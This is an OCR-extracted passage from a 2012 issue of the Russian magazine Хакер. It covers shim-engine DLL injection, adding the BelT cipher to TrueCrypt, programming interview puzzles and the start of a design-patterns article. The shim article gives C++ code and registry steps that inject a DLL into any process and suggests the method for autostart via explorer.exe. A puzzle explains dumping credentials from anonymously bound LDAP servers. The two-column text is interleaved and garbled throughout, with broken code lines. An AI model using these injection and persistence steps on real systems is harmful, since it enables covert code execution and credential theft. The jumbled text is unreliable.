[MSG ] [SeiInit] Using SHIM "VirtualRegistry!AcLayers.DLL" ше всего с начала работы системного загрузчика, а системный
[MSG ] [SeiInit] Command line for Shim "VirtualRegistry" : загрузчик начинает работу с apc-диспетчера.
"WIN2K" Но мы не будем закапываться в такие недра и начнем с функции
[INFO] [SeiInit] GetHookAPIs returns 27 hooks for DLL "C:\ инициализации вышеупомянутого загрузчика PE-файлов:
WINDOWS\AppPatch\AcLayers.DLL" SHIM "VirtualRegistry"
[MSG ] [SeiInit] Using SHIM "DuplicateHandleFix!AcLayers.DLL" _LdrpInitializeProcess:
[INFO] [SeiInit] GetHookAPIs returns 1 hooks for DLL "C:\ .text:7C921B36 mov eax, large fs:18h ; TEB
WINDOWS\AppPatch\AcLayers.DLL" SHIM "DuplicateHandleFix" .text:7C921B3C mov ebx, [eax+30h] ; PEB
[INFO] [SE_DllLoaded] INIT. loading DLL "AcGenral.DLL". ...
... .text:7C921B62 lea eax, [ebx+1E8h] ; peb->pShimData
[MSG ] [SeiInit] Using SHIM "LoadLibraryCWD!AcGenral.DLL" .text:7C921B68 mov ecx, [eax]
[INFO] [SeiInit] GetHookAPIs returns 0 hooks for DLL "C:\ ...
WINDOWS\AppPatch\AcGenral.DLL" SHIM "LoadLibraryCWD" .text:7C921B87 mov [ebp+var_104], ecx
[MSG ] [SeiInit] Using SHIM "Win2kPropagateLayer!AcLayers.DLL" ...
[INFO] [SeiInit] GetHookAPIs returns 3 hooks for DLL "C:\ loc_7C921693:
WINDOWS\AppPatch\AcLayers.DLL" SHIM "Win2kPropagateLayer"
...
Из них видно, что загру зился с лой Win2000, а так же .text:7C921693 mov edi, [ebp+var_104]
с тандартная shim dll – C:\WINDOWS\ AppPatch\ AcLayers.DLL. .text:7C921699 xor esi, esi
Пос ле этого произошло извлечение и применение шимов, .text:7C92169B cmp edi, esi
таких как Vir tualRegistr y, DuplicateHandleFix и так далее, .text:7C92169D jz loc_7C923CD0
а затем у же перехват функций (перехватов много, логи ; если первый ULONG в peb->pShimData == 0,
поскипаны).В реестре тем временем сформировалась следующая ; то прыгаем (в случае включенного шима
запись: ; совместимости прыжка не происходит)

ХАКЕР 04 /159/ 2012 085

КОДИНГ

s = idautils.Strings( False )
s.setup( strtypes = Strings.STR_UNICODE | Strings.STR_C )

for i, v in enumerate( s ):
if v is None:
print( "Failed on %d" % i )
else:
print( "%x => %s" % ( v.ea, str( v ) ) )

print "Script Started..."

EnumStrings()
print "Script Ended..."

idautils.Strings(False) — в конструкторе по умолчанию стоит

True, но так как нас интересуют помимо обычных строк еще и юни-
кодные, то ставим default_setup = False и настраиваем setup сами.
Выполняем скрипт на загруженной в IDA библиотеке, просматрива-
ем выведенные строки и почти в самом конце находим интересный
ключ:

5d0749b0 -> \Registry\Machine\Software\Microsoft\Windows

NT\CurrentVersion\AppCompatFlags\InstalledSDB

По xref’у добираемся до функции SdbResolveDatabase, кото-

рая открывает данный ключ и смотрит значения DatabasePath
и DatabaseType. Далее определяем, что данный ключ предназна-
чен (о чудо!) для пользовательских баз шимов, которые должны
быть представлены в виде GUID’ов (как в реестре, так и в самой
базе).
Таким образом, ключ вида {GUID} и два значения (DatabasePath
и DatabaseType) — это все что нам нужно для прописывания базы
для конкретного приложения.

СОЗДАНИЕ СОБСТВЕННОЙ БАЗЫ ШИМОВ

Куда прописать базу, мы определили, но вопрос о том, как форми-
ровать саму базу шимов, остался открытым. А ведь это реальная
проблема, формат базы неизвестен, его придется восстанавли-
вать вручную, а это очень большая работа.
Может быть, есть какой-то обходной путь? Он действительно
есть, и заключается в использовании уже готовой базы! Все
что нам нужно - найти приложение, которое использует свою
Логи шимов в WinDbg
базу, и подменить в ней некоторые данные на наши. Приложе-
ние, которое нашел я, называется EMET (goo.gl/9Dn5L). Качаем,
.text:7C9216A3 push edi запускаем Process Monitor от Руссиновича, чтобы фиксировать
.text:7C9216A4 push [ebp+var_D8] все действия программы, устанавливаем EMET, запускаем C:\
.text:7C9216AA mov [ebx+1ECh], esi Program Files\EMET\EMET_GUI.exe, выбираем Configure Apps,
.text:7C9216B0 push edi добавляем наш test.exe, закрываем EMET. В логах монитора
.text:7C9216B1 call _LdrpLoadShimEngine@12 видим, что база шимов EMET’а установилась в C:\WINDOWS\
; а вот и момент загрузки движка шимов AppPatch\Custom\{f8c4cc07-6dc4-418f-b72b-304fcdb64052}.
sdb, а dll скопировалась в C:\WINDOWS\AppPatch\EMET.dll.
В LdrpLoadShimEngine первым параметром передается Также из логов монитора получаем информацию об изме-
shimeng.dll. нениях в реестре. Был создан ключ SOFTWARE\\Microsoft\\
LdrpLoadShimEngine грузит эту dll, получает адреса функций Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\test.
из нее (LdrpGetShimEngineInterface), загружает базы шимов exe с нашим тестовым ехе, а также ключ, найденный нами
(SdbInitDatabase), распаковывает их (SdbUnpackAppCompatData) ранее — SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\
и применяет. Именно отсюда мы узнаем, что движок совме- AppCompatFlags\\InstalledSDB\\{f8c4cc07-6dc4-418f-b72b-
стимости живет в shimeng.dll. Давай поищем в этой dll строки, 304fcdb64052}.
содержащие ключи реестра, может быть найдем какие-нибудь Как видишь, для принудительного указания шима исполь-
недокументированные ключи, которые укажут нам, как внедрить зовалось не стандартное место Layers, а Custom. Учтем. Теперь
в систему свою базу шимов? Проще всего строки искать скрип- открываем базу любым hex-редактором, находим emet.dll и ис-
том. Я предпочитаю питон(IdaPython): правляем на test.dll. Далее берем test.dll и закидываем в пап-
ку C:\WINDOWS\AppPatch\. Запускаем наш test.exe и пробуем
import idaapi убедиться, что test.dll проинжектировалась в test.exe. Для этого
import idautils можно воспользоваться утилитой vmmap (goo.gl/SsSQn) от того
import idc же Руссиновича. Открываем test.exe с помощью vmmap и ви-
дим в его адресном пространстве нашу dll, а значит — mission
def EnumStrings(): complete!

086 ХАКЕР 04 /159/ 2012

 Shim: новый метод инжекта

АВТОМАТИЗИРУЕМ ПРОЦЕСС
Теперь напишем программу, которая будет все автоматически де-
лать за нас, то есть записывать в реестр базу шимов и копировать
саму базу и dll к ней в системную папку (все проверки поскипаны,
полный вариант см. на диске):

#include <windows.h>
#include <iostream>

#define GUID L"{f8c4cc07-6dc4-418f-b72b-304fcdb64052}"

#define SHIM_REGKEY L"SOFTWARE\\Microsoft\\Windows NT\\
CurrentVersion\\AppCompatFlags "

BOOL RegisterShimDll()
{
Dll успешно внедрена
HKEY key;
BOOL funcResult = FALSE;
wchar_t dbPath[] = L"C:\\Windows\\AppPatch\\Custom\\"
GUID L".sdb"; KEY_WRITE, NULL, &key, NULL);
DWORD dbType = 0x10000;
DWORD64 sdb = 0x1cc8828b2208e82; RegSetValueEx(key, L"DatabasePath", 0,
REG_SZ, (BYTE*)dbPath, sizeof(dbPath));
// создаем подраздел Custom в AppCompatFlags RegSetValueEx(key, L"DatabaseType", 0, REG_DWORD,
RegCreateKeyEx(HKEY_LOCAL_MACHINE, (PBYTE)&dbType, sizeof(DWORD));
SHIM_REGKEY L"\\Custom", 0, NULL, RegCloseKey(key);
REG_OPTION_NON_VOLATILE, KEY_WRITE, NULL,
&key, NULL); return TRUE;
RegCloseKey(key); }

// создаем ключ BOOL CopyShimFiles()

RegCreateKeyEx(HKEY_LOCAL_MACHINE, {
SHIM_REGKEY L"\\Custom\\test.exe", CreateDirectory(L"C:\\Windows\\AppPatch\\Custom", NULL);
0, NULL, REG_OPTION_NON_VOLATILE,
KEY_WRITE, NULL, &key, NULL); CopyFile( GUID L".sdb",
RegSetValueEx(key, GUID L".sdb", 0, L"C:\\Windows\\AppPatch\\Custom\\" GUID L".sdb",
REG_QWORD, (PBYTE)&sdb, sizeof(DWORD64)); TRUE );
RegCloseKey(key); CopyFile( L"test.dll",
L"C:\\Windows\\AppPatch\\test.dll", TRUE );
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
SHIM_REGKEY L"\\InstalledSDB", return TRUE;
0, NULL, _OPTION_NON_VOLATILE, KEY_WRITE, NULL, }
&key, NULL);
RegCloseKey(key);
int main()
RegCreateKeyEx(HKEY_LOCAL_MACHINE, {
SHIM_REGKEY L"\\InstalledSDB\\" GUID,
0, NULL, REG_OPTION_NON_VOLATILE, CopyShimFiles();
RegisterShimDll();

std::cout << "Shim inject complete... " << std::endl;

ФУНКЦИИ SHIMENG.DLL std::cout << "Run test.exe and use vmmap.exe to see
test.dll in AP test.exe" << std::endl;

У shimeng.dll есть восемь экспортируемых функций: return 0;

SE_DllLoaded — вызывается лоадером при загрузке dll; }
SE_DllUnloaded — вызывается лоадером при выгрузке dll;
SE_DynamicShim — неизвестно кем вызывается; ЗАКЛЮЧЕНИЕ
SE_GetProcAddress — вызывается лоадером при GetProcAddress; Описать в одной статье все преимущества столь мощной тех-
SE_InstallAfterInit — вызывается лоадером после инициализации нологии как shim engine не получится, но даже из этой статьи
движка шимов; можно почерпнуть многое.
SE_InstallBeforeInit — вызывается лоадером сразу после того, как Во-первых, шимы дают возможность инжектироваться в лю-
он получит указатели на данные функции; бое приложение средствами самой системы.
SE_IsShimDll — вызывается кодом из этой же dll; Во-вторых, прописав шим, например, для explorer.exe,
SE_ProcessDying — вызывается при уничтожении процесса, то есть этот факт может быть использован и как метод автозагрузки.
чуть раньше того момента, когда все точки входа dll’ок процесса А в-третьих, шимы дают возможность еще и перехватывать
вызываются с причиной DLL_PROCESS_DETACH. функции атакуемого приложения, однако это требует детального
изучения формата базы. z

ХАКЕР 04 /159/ 2012 087

КОДИНГ Johnny Catch ([email protected])

TRUE-
криптование
ДОБАВЛЯЕМ ПОДДЕРЖКУ
СВОИХ АЛГОРИТМОВ
В TRUECRYPT
Наверняка все, кто когда-либо сталкивался
с задачей создания шифрованного контейнера,
знают о существовании программы TrueCrypt.
Простота использования, высокая скорость
работы, открытые исходники и широкие
функциональные возможности сделали этот
шифровальщик одним из самых популярных
в мире. Сегодня речь пойдет о том, как
переделать его под себя.

а сегодняшний день TrueCrypt является одной из самых

Н популярных программ для создания шифрованных файлов-
контейнеров, шифрованных носителей информации, а также
для шифрования операционных систем. При использовании средств
подобного рода иногда возникает потребность удостовериться в от-
сутствии в коде программы и алгоритмов шифрования различных
закладок, которые могут скрытно сохранять информацию о ключах.
Убедившись в обратном, возникает желание сделать собственными
руками «доверенный» билд программы, в котором точно будет все ок.
Также недоверие к зарубежным шифрам и здоровый патриотизм по-
рой наталкивают на мысль добавить в данную программу отечествен-
ные криптографические алгоритмы, которые во многом не уступают
зарубежным аналогам. Реализовать и то, и другое позволяет наличие
открытых исходных текстов TrueCrypt.

ПОДГОТОВКА К РАБОТЕ
Прежде чем приступать к реализации нового алгоритма шифро-
вания, подготовим все, что нужно для сборки. В первую очередь
нам понадобятся исходники программы, которые можно скачать
с официального сайта разработчика truecrypt.org (я использовал
исходники версии 7.0a). В качестве среды разработки будем ис-
Главное окно программы TrueCrypt пользовать MS Visual Studio 2010 (несмотря на то, что разработчики

088 ХАКЕР 04 /159/ 2012

 True-криптование

стандарта в Белоруссии. Этот алгоритм работает с блоками данных

длиной 128 бит и с ключами длиной 128, 192 или 256 бит. Для ко-
динга я выбрал вариант шифра с 256-битным ключом.
Программная реализация любого симметричного шифра
в TrueCrypt должна содержать в себе следующие три функции:
функцию инициализации шифра, которая осуществляет выработку
массива раундовых подключей из ключа шифрования, функцию
шифрования и функцию расшифровки блока сообщения.
Для алгоритма BelT функция инициализации будет иметь сле-
дующий вид:

void belt_init(unsigned __int8 * k, int kLen,

unsigned __int8* ks)
{
for(i = 0; i<32; ++i) ks[i] = k[i];
}

Первый параметр функции — массив, содержащий ключ

шифрования данных, второй параметр — длина данного ключа,
а третий — массив раундовых подключей (его длина задается
в коде TrueCrypt константой MAX_KEY_LENGTH — максимальная
длина key schedule алгоритмов шифрования, поддерживающихся
TrueCrypt).
В данной реализации функции belt_init есть две особенности.
Во-первых, мы знаем точно, что на вход будет подаваться массив
длиной в 32 байта, поэтому проверку значения kLen можно опу-
стить (хотя можно поставить assert). Второй момент — здесь мы
просто один раз копируем ключ в массив раундовых ключей вместо
многократного копирования ключа. Принимая во внимание Cold
Boot Attack, при создании программных реализаций алгоритмов
я стремлюсь минимизировать количество ключевой информации
Схема работы алгоритма BelT
в оперативной памяти компьютера, и данная реализация шифра
создается с учетом этого.
используют MS VS 2008 SP1). Также нам понадобится 16-битный Переходим к функции шифрования блока данных (кодинг
компилятор от Microsoft, который идет в комплекте с MS Visual C++ функции расшифровки смотри на диске). Итак, сначала зададим
1.52. Эту версию студии можно скачать по подписке MSDN, либо несколько глобальных переменных:
с рутрекера :). К слову сказать, 16-битный компилятор нужен для
компиляции кода образов загрузочной дискеты, которая может //блок подстановки (SBox)
оказаться незаменимым помощником при восстановлении данных unsigned __int8 H[256] = {...};
из-за повреждения кода загрузчика на жестком диске. Также //массив с индексами подключей
следует отметить, что устанавливать Visual C++ 1.52 тебе не нужно unsigned int KeyIndex[8][7] = {...};
— необходимо только распаковать архив.
Кроме перечисленного потребуются NASM, gzip, WinDDK, а так- Массив H является блоком подстановки, который задается табли-
же хедеры PKSC#11 (доступны на сайте RSA Data Security). цей (смотри стандарт СТБ 34.101.31-2011), второй массив представля-
Если все скачано и установлено, приступаем к настройке этого ет собой индексы используемых раундовых подключей. Для ускоре-
добра. В первую очередь нам необходимо добавить несколько ния работы кода некоторые операции оформим в виде макросов:
переменных среды:
1. MSVC16_ROOT со значением, равным пути к папке MSVC15, которая #define HU1(x,H) (((unsigned __int32) (H)[ U1((x)) ]) < < 24)
будет создана после извлечения архива с Microsoft Visual C++ 1.52; #define HU2(x,H) (((unsigned __int32) (H)[ U2((x)) ]) << 16)
2. WINDDK_ROOT со значением, равным пути, по которому мы уста- #define HU3(x,H) (((unsigned __int32) (H)[ U3((x)) ]) << 8)
новили WinDDK;
3. PKCS11_INC со значением, равным пути к папке с PKCS#11-
хедерами.
Дальше подкорректируем значение переменной PATH, к кото-
рой добавим пути к exe’шникам от NASM и gzip. После правок пере- РЕЖИМ XTS
менных среды может потребоваться перезагрузка компьютера. Для
проверки корректности правок PATH попробуй открыть командную
строку, перейти в корень диска C:\ и запустить gzip.exe. Если за- XTS — основной режим работы блочных шифров в программе
пуск прошел успешно, то все ок. Раз все установлено и настроено, TrueCrypt. По сути, данный режим является слегка измененным
попробуем сделать билд TrueCrypt: распаковываем исходники, режимом XEX, который был разработан Филиппом Рогауэем в 2003
открываем солюшн в Visual Studio (попутно его конвертируем), вы- году. Отличия между режимами заключаются в том, что XEX для
бираем конфигурацию All и жмем Build. Если все хорошо, то в папке двух различных целей использует один и тот же ключ, в то время
Release окажется свежескомпилированный TrueCrypt. Теперь как XTS использует два независимых ключа. В 2010 году режим XTS
давай добавим в него поддержку нового алгоритма шифрования. был одобрен NIST для обеспечения конфиденциальности данных
в устройствах хранения информации. Также в 2007 этот режим
КОДИНГ АЛГОРИТМА был одобрен IEEE (IEEE 1619). Схему работы режима XTS смотри
В качестве алгоритма шифрования для встраивания я выбрал сим- на рисунке.
метричный алгоритм BelT, который недавно был принят в качестве

ХАКЕР 04 /159/ 2012 089

КОДИНГ

#define HU4(x,H) (((unsigned __int32) (H)[ U4((x)) ]))

#define G(x,H,r) RotHi(HU4((x),(H)) | HU3((x),(H)) \
| HU2((x),(H)) | HU1((x),(H)),(r))

Макросы HU применяют блок подстановки к определенному

байту в DWORD, а макрос G задает одноименное преобразование из
описания шифра. После определения нужных макросов остает-
ся только запрограммировать схему работы алгоритма (смотри
рисунок).
Прототип функции шифрования одного блока имеет вид:

void belt_encrypt
(
unsigned __int8 *ks,
unsigned __int8 * inBlock,
unsigned __int8 * outBlock
Результаты бенчмарка TrueCrypt
);

Реализация данной функции приведена на рисунке. В целом оставить возможность использования нашего алгоритма для
программная реализация шифрования одного блока не вызы- шифрования системы в целом. Также объявим константу, опреде-
вает проблем — блок делится на четыре значения типа DWORD, ляющую размер key schedule нашего алгоритма (как помнишь, я
над которыми в течение восьми раундов проводятся операции специально сделал так, чтобы он совпадал с основным ключом, то
наложения подстановки, сдвига, сложения и так далее. И соз- есть был равен 32 байтам):
дание программной реализации алгоритма BelT не сложнее
программирования известного алгоритма ГОСТ28147-89. На #define BELT_KS 32
данном этапе все готово к встраиванию алгоритма в программу
TrueCrypt. Далее в файле находим строку вида #ifdef TC_WINDOWS_BOOT_
SINGLE_MODE. В данном макросе указывается максимальный
МОДИФИКАЦИЯ TRUECRYPT размер key shedule при компиляции загрузчика, поддерживающего
Итак, первым делом открываем в MSVS 2010 солюшн с TrueCrypt всего один алгоритм шифрования. В конце макроса добавляем
и находим проект Crypto, который содержит исходные тексты всех пару строк:
алгоритмов шифрования, используемых в программе. В этот проект
мы добавляем файлы с реализованным нами алгоритмом BelT. Да- #elif defined(TC_WINDOWS_BOOT_BELT)
лее в любом проекте (например, Mount) открываем заголовочный #define MAX_EXPANDED_KEY BELT_KS
файл Crypto.h и находим перечисление вида: #endif

enum { После делаем include заголовочного файла нашей программ-

NONE = 0, ной реализации шифра BelT (#include "Belt.h"). С файлом Crypto.h
AES, закончено.
... Переходим к файлу Crypto.c, в котором в первую очередь на-
}; ходим объявление массива Ciphers[] со структурами типа Cipher.
В данный массив добавляем структуру с характеристиками наше-
Это перечисление содержит идентификаторы используемых го алгоритма — до строки «#ifndef TC_WIN...» делаем вставку:
криптографических алгоритмов. Добавим в него идентификатор
BELT, однако сделаем это до строки «#ifndef TC_WIN...», чтобы { BELT, "BelT (СТБ 34.101.31)", 16, 32, BELT_KS },

АЛГОРИТМ СТБ 34.101.31-2011

Блочный алгоритм шифрования BelT, описанный в стандарте СТБ Алгоритм состоит из восьми раундов, общая схема каждого раунда
34.101.31-2011, появился на свет относительно недавно, и в настоящий представлена на рисунке. Блок данных в 128 бит разбивается на четыре
момент принят в качестве стандарта в Белоруссии. Belt работает 32-битных значения, с которыми и ведется работа. На рисунке буквой
с блоками длиной 128 бит и использует ключи длиной 128, 192 или 256 K с индексом обозначаются раундовые подключи, которых целых 56
бит. штук. Вырабатываются раундовые ключи из основного 256-битного
Конструктивно алгоритм слегка напоминает ГОСТ 28147-89 — ключа (k[1],..., k[8]) очень просто:
в обоих случаях раундовые ключи «вводятся» путем суммирования
по модулю 2^32, после чего применяется блок подстановки (таблицы K[1]=k[1], ..., K[8]=k[8], K[9]=k[1], ..., K[56]=k[8]
замены в ГОСТ) и осуществляется сдвиг результата на некоторое число
позиций в сторону старших разрядов. Однако есть и существенные то есть путем семикратного копирования.
различия: ГОСТ построен на основе сети Фейстеля, а в конструкции Belt Отсчет раундов алгоритма ведется с 1, номер раунда хранится
применяется SP-сеть. в переменной i. Операция G состоит из преобразования 32-разрядного
Как видишь, в алгоритме для преобразования информации значения при помощи блока подстановки H и циклического сдвига
применяются простые и легко реализуемые операции: сложение по полученного значения на определенное число разрядов влево. В целом
модулю 2^32, XOR, циклический сдвиг и замена. схема алгоритма довольно проста для программной реализации.

090 ХАКЕР 04 /159/ 2012

 True-криптование

Зашифрование в соответствии с алгоритмом BelT Режим работы XTS

Первым элементом структуры Cipher является идентификатор в стандарте СТБ 34.101.31 (проверка корректной работы алгоритма
алгоритма, далее идет текстовая строка с его названием, тре- шифрования), а также путем шифрования блока данных в режиме
тий элемент — размер блока алгоритма в байтах, далее раз- XTS, подсчета CRC32 от полученного шифрованного текста и срав-
мер ключа и размер key shedule соответственно. Далее следует нения значения контрольной суммы с эталоном. В этот раз опять
внести коррективы в массив EncryptionAlgorithms[] структур отправляю тебя смотреть исходники на диске, так как в програм-
EncryptionAlgorithm. Данный массив инициализируется по-разному мировании механизма самотестирования в действительности нет
в зависимости от того, определен ли TC_WINDOWS_BOOT, и нам ничего интересного.
необходимо внести правки в обе его части. В массив добавляем
строку (вторая часть массива изменяется аналогично): ПАРА СЛОВ О ГОСТ28147-89
В чистом виде данный алгоритм добавлять в TrueCrypt нельзя,
{{ BELT, 0 }, {XTS, 0, 0, 0}, 1} так как используемая в нем программная реализация режима
XTS предполагает, что алгоритм шифрования работает с блоками
В данной структуре первым элементом является список исполь- длиной 128 бит, в то время как длина блока алгоритма ГОСТ — 64
зуемых алгоритмов (могут использоваться несколько алгоритмов бита. Как ты уже догадался, это приведет к тому, что половина
подряд), затем задается режим работы шифра — в данном случае данных окажется в открытом виде. Есть вариант использовать
указываем XTS (описание данного режима работы смотри на ГОСТ два раза, то есть блок в 128 бит разбивать на два 64-бит-
врезке), а последнее значение является индикатором того, устарел ных блока и каждый из них отдельно шифровать при помощи
ли алгоритм или нет (устаревшие алгоритмы используются для ГОСТ, однако данный путь также неприемлем (предлагаю тебе
обратной совместимости со старыми версиями TrueCrypt). Вторую самому подумать, почему). В исходники на диске добавлена
часть массива структур правим аналогичным образом. поддержка ГОСТ в случае, когда шифруется половина блока,
Далее переходим к изменению функции CipherInit, которая, а половина — остается незашифрованной. Ясно, что данный
как видно из названия, производит инициализацию алгоритма функционал нельзя использовать для защиты конфиденциаль-
шифрования. В ходе работы этой функции осуществляется key ных данных!
schedule шифра, поэтому смело добавляем в нее код, отвечающий
за инициализацию нашего алгоритма: ИСХОДНИКИ
Лицензия TrueCrypt налагает некоторые ограничения на исполь-
case BELT: зование кода — при его модификации необходимо обязательно
belt_init(key, ks); убрать все логотипы с названием TrueCrypt, название модифи-
break; цированной программы не должно содержать строку «truecrypt»,
а также должны быть убраны все ссылки на сайт truecrypt.org (за
Аналогичным образом модифицируем функции EncipherBlock исключением окна «О программе»). В связи с этим, а также из
(отвечает за шифрование одного блока открытого текста), уважения к разработчикам, в исходниках на диске все упоминания
DecipherBlock (отвечает за расшифровку блока). Кроме того, не- о TrueCrypt изменены на PlainCrypt, а все ссылки ведут на http://
обходимо подправить некоторые макросы (смотри в исходниках localhost/.
на диске), чтобы можно было осуществлять шифрование системы Также хочу отметить, что у пользователей Win7/Vista версии x64
алгоритмом Belt. возникнут проблемы с установкой неподписанных драйверов. Что-
После внесенных изменений осталось, по сути, сделать три бы заставить драйверы работать корректно, необходимо подписать
вещи — немного поменять настройки проектов, добавить поддерж- их тестовой ЭЦП, а также включить специальный тестовый режим.
ку наших алгоритмов в механизм самотестирования TrueCrypt, Подробная инфа о том, как это сделать, есть как на сайте Microsoft,
а также добавить в ресурсы файлы bootloader’a с поддержкой так и в свободном доступе в интернете.
BelT. С правкой настроек проектов и ресурсов я предлагаю тебе
справиться самостоятельно или посмотреть, как это сделано HAPPY END
в исходниках на диске (там нет ничего сложного). Что же касается Вот, собственно, и все. Теперь, немного напрягшись, ты можешь
механизма самотестирования, то тут проверка осуществляется поставить себе на службу отличную шифровалку со своими соб-
двумя способами: при помощи тестовых векторов, определенных ственными криптографическими алгоритмами. z

ХАКЕР 04 /159/ 2012 091

КОДИНГ Павел Александрович (ivinside.blogspot.com)

Задачи на
собеседованиях

Если тебе на собеседовании или

ПОДБОРКА ИНТЕРЕСНЫХ интервью попалась интересная
ЗАДАНИЙ, КОТОРЫХ ДАЮТ задача – смело присылай ее мне,
разберем ее в следующих выпусках
НА СОБЕСЕДОВАНИЯХ нашей маленькой рубрики.

092 ХАКЕР 04 /159/ 2012

 Задачи на собеседованиях

УСЛОВИЕ >>> myappend(**a)

Напиши функцию, которая будет получать на вход два списка и
возвращать словарь, в котором ключи — элементы первого списка, РЕШЕНИЕ
а значения — элементы второго списка или None, если соответ- При выполнении программы будет такой вывод:
ствующий элемент отсутствует.
[1, 2, 3, 0]
>>> a = ["a","b","c"] [0]
>>> b = [1, 2] [0, 0]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None} В первом случае функция отрабатывает в самом обычном режи-
ме и к списку [1, 2, 3] просто добавляется новый элемент.
РЕШЕНИЕ Во втором случае, так как параметров при вызове не задано,
Мое первоначальное решение выглядело так: используется параметр по умолчанию и создается новый объект
— пустой список «a», к которому добавляется новый элемент 0. В
def dictify(a, b): третьей строчке снова параметр не задан и используется список,
# возвращаем пустой словарь, если элементов больше, созданный при втором вызове функции myappend(), так как спи-
# чем ключей сок — изменяемый объект.
if len(b) > len(a): Далее при вызове myappend(*a) возникнет исключение:
return {} AttributeError: 'int' object has no attribute 'append', потому что
функции передается словарь со значениями, а вышеприведенный
# конструируем словарь с помощью встроенных способ подразумевает передачу списка. В этом случае правильно
# функций zip и dict было бы сделать так:
dic = dict(zip(a, b))
# дополняем словарь пустыми элементами, если таковые имеются a = [[1, 2], 3]
if len(b) < len(a): myappend(*a)
for i in xrange(len(b), len(a)): # что эквивалентно такому вызову:
dic[a[i]] = None # myappend([1, 2], 3)
return dic
При вызове myappend(**a) тоже возникнет исключение, но не-
Стоит отметить, что в Python версии менее 2.2 еще не существо- сколько другое: TypeError: myappend() keywords must be strings. В
вало конструктора dict, и списки превращались в словари только с этом случае должен передаваться словарь именованных аргумен-
помощью цикла for: тов, что, в общем-то, и делается, но с ошибкой: названия ключей
словаря должны соответствовать названиям аргументов, то есть
keys = ['a', 'b', 'c'] корректный вызов будет выглядеть так:
vals = [1, 2, 3]
dic = {} a = {'a':[1, 2], 'num':3}
for (k, v) in zip(keys, vals) dic[k] = v myappend(**a)
# что эквивалентно такому вызову:
Тогда я забыл про одну родственную и более старую встроенную # myappend([1, 2], 3)
функцию map, которая применяет заданную функцию к каждому
элементу последовательности. Но если вместо функции ей пере- УСЛОВИЕ
дать None, то она просто объединяет элементы подобно zip, при Напиши класс, который хранит список своих экземпляров и позво-
этом автоматически заполняя отсутствующие значения словаря ляет итегрировать по ним.
None. В итоге решение задачки еще больше упростилось:
>>> a = Keeper()
def dictify(a, b): >>> b = Keeper()
if len(b) > len(a): >>> for i in Keeper.list_instances():
return {} ... print i
dic = dict(map(None, a, b)) <Keeper instance at 0x...
return dic
РЕШЕНИЕ
УСЛОВИЕ Для решения этой задачки нужно знать про такой шаблон
Есть такая функция: проектирования как декоратор и уметь его применять в языке
Python. Вообще говоря, в питоне декоратор — это функция, которая
def myappend(a = [], num = 0): применяется к другой функции для расширения или изменения ее
a.append(num) поведения. Синтаксис декораторов является попросту синтаксиче-
print a ским сахаром:

Что будет происходить при выполнении следующего кода и def f(...):

почему: ...
f = staticmethod(f)
>>> a = [1, 2, 3]
>>> myappend(a) @staticmethod
>>> myappend() def f(...):
>>> myappend() ...
>>> a = {1:2, 3:4}
>>> myappend(*a) В этом примере как раз-таки и показано применение нужного

ХАКЕР 04 /159/ 2012 093

КОДИНГ

нам декоратора — staticmethod, который превращает обычный РЕШЕНИЕ

метод класса в статический, то есть теперь этот метод можно Эта строчка, как ты уже догадался, из результата сканирования
вызывать напрямую, без создания экземпляра класса. Воспользу- nmap. Она сообщает, что на сканируемой машине открыт tcp-порт
емся им при решении задачи (список экземпляров будем хранить в 389, на котором расположился LDAP-сервер. Слова «Anonymous
переменной instances): bind OK» как бы намекают нам, что он не простой, а с возмож-
ностью анонимного подключения к LDAP-каталогу, то есть без
class Keeper: знания пользовательского DN и пароля.
instances = [] Мы этим непременно воспользуемся и попытаемся получить
def __init__(self): оттуда информацию, среди которой могут быть всякие интересные
self.instances.append(self) штуки типа login:hash, но в общем случае там может находиться что
@staticmethod угодно. Для этого существуют специальные программы.
def list_instances():
return Keeper.instances 1. ldapminer. Его синтаксис:

a = Keeper() ldapminer -h <ip_адрес> <опции>

b = Keeper() -p [port]: по умолчанию равен 389
for i in Keeper.list_instances(): -B [bind]: имя пользователя
print i -w [password]: пароль
-b [base search]: поиск по пользователю, группе
В функции __init__, которая выполняется при создании экзем- -d [dump all]: получить всю информацию
пляра класса, к списку instances добавляется ссылка на наш све-
жесозданный объект, а функция list_instances возвращает список, 2. luma. Утилита с графическим интерфейсом, весьма проста в
который по умолчанию поддерживает итерационный протокол. освоении.
Вывод программы будет примерно такой: 3. ldp. Еще одна графическая утилита, на этот раз от Microsoft.
4. openldap. Набор консольных утилит для взаимодействия с
<__main__.Keeper instance at 0xb72aed4c> LDAP-каталогами. Конкретно в нашем случае нужно использо-
<__main__.Keeper instance at 0xb72aee2c> вать ldapsearch. Синтаксис приводить здесь не буду, он очень уж
страшный.
УСЛОВИЕ
Что это и что с этим можно сделать? Как ни странно, во всеми любимом Metasploit до сих пор нет
модуля для дампа LDAP-каталога, хотя реквест о такой функции
389/tcp open ldap (Anonymous bind OK) был подан около двух лет назад. z

В СЛЕДУЮЩЕМ ВЫПУСКЕ

1. Что будет выведено в результате исполнения программы? Почему? class Bar: Foo
{
class A: public:
def __init__(self, name): Bar(int j) { i=new char[j]; }
self.name = name ~Bar() { delete i; }
def __del__(self): private:
print self.name, char* i;
};
aa = [A(str(i)) for i in range(3)]
for a in aa: void main()
del a {
Foo* f=new Foo(100);
print 'done' Foo* b=new Bar(200);
*f=*b;
# ... delete f;
delete b;
2. Перечисли все проблемы, которые ты видишь в данном коде: }

class Foo 3. У тебя есть файл (например, access-лог web-сервера) очень большого
{ размера. Пользователи часто запрашивают из него строчки по их
public: номеру. Нужно реализовать функцию, которая бы возвращала строчку
Foo(int j) { i=new int[j]; } с произвольным номером за время, независимое от номера строчки и
~Foo() { delete i; } размера файла.
private:
int* i; 4. Напиши функцию сортировки массива чисел. Если знаешь несколько
}; способов – используй наиболее быстрый из известных тебе алгорит-
мов.

094 ХАКЕР 04 /159/ 2012

КОДИНГ deeonis ([email protected])

прошлой статье про паттерны «Фасад» и «Адаптер» мы

ИНКАПСУЛЯЦИЯ В представили, что работаем над парсером, который со-
бирает инфу с определенных сайтов. Сегодня мы будем

АЛГОРИТМОВ продолжать нашу воображаемую работу, что позволит нам

вникнуть в суть другого паттерна объектно-ориентированного
программирования под названием «Шаблонный метод».
Конкретизируем область применения нашей мегатулзы:
она будет сканить всяческие доски объявлений и форумы. Как
известно, html-код у разных форумных движков разный, но
